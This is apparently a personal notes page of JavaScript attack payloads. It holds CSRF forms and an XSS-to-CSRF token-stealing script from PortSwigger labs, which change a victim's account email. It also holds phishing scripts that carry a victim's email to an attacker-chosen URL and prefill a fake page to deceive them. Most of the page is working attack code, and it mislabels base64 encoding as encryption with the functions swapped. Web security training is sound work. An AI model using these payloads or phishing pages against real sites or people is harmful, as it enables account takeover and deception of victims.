Javascript Crafting
PSG CSRF 1 : No Validation
<form method="POST" action="https://0a3700f504731a4780bc0d2500a000f6.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="ttttt@test.com">
</form>
<script>
document.forms[0].submit();
</script>
PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST
<form action="https://0a3200e70330e7bb86d263eb00300092.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="wqwqqqqe@dwa.com" />
<input type="hidden" name="csrf" value="57wADTL15Fs0pWIwqejKzreJVbVp80fO" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
XSS to CSRF Changing email
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=t3st@test.com')
};
</script>
Go to the account page
Make POST request to change email
Remember supply necessary parameter (can get from burp post request)
CSRF placing email bot from parameter and redirecting it to another host
<script>
function onWindowLoad() {
const urlParams = new URLSearchParams(window.location.search);
const email = urlParams.get('email');
const destination = urlParams.get('url');
var xhr = new XMLHttpRequest();
xhr.open('GET', destination, true);
xhr.send();
fetch(destination);
var outputCdc = document.getElementById("gf-user");
outputCdc.innerText=`${email}`;
}
window.onload = onWindowLoad;
function redirected() {
const urlParams = new URLSearchParams(window.location.search);
const destination = urlParams.get('url');
const email = urlParams.get('email');
const emailb = btoa(email);
if (destination) {
window.location.href = destination + "&key=" + emailb;
} else {
window.location.href = 'defaultPage.html';
}
}
</script>
Obtain
email
andurl
fromvictim opened link
url
will be used as redirected hostPlace the value of
email
into the input box as placeholder (to trick victim thinking its legit website)When victim press the
Proceed
button , they get redirected tourl
+key
where key is their email encrypted in base64
CSRF placing email obtained from parameter
<script>
window.onload = function() {
const urlParams = new URLSearchParams(window.location.search);
const emailb = urlParams.get('key');
const email = atob(emailb);
const inpele2 = document.getElementById('emailkau');
const inpele3 = document.getElementById('displayName');
inpele2.value = email;
inpele3.textContent = email;
};
</script>
Must have base64 email (key) of victim (atob to encrypt and btoa to decrypt base64)
Pass in the value as email place holder to trick victim
Last updated
Was this helpful?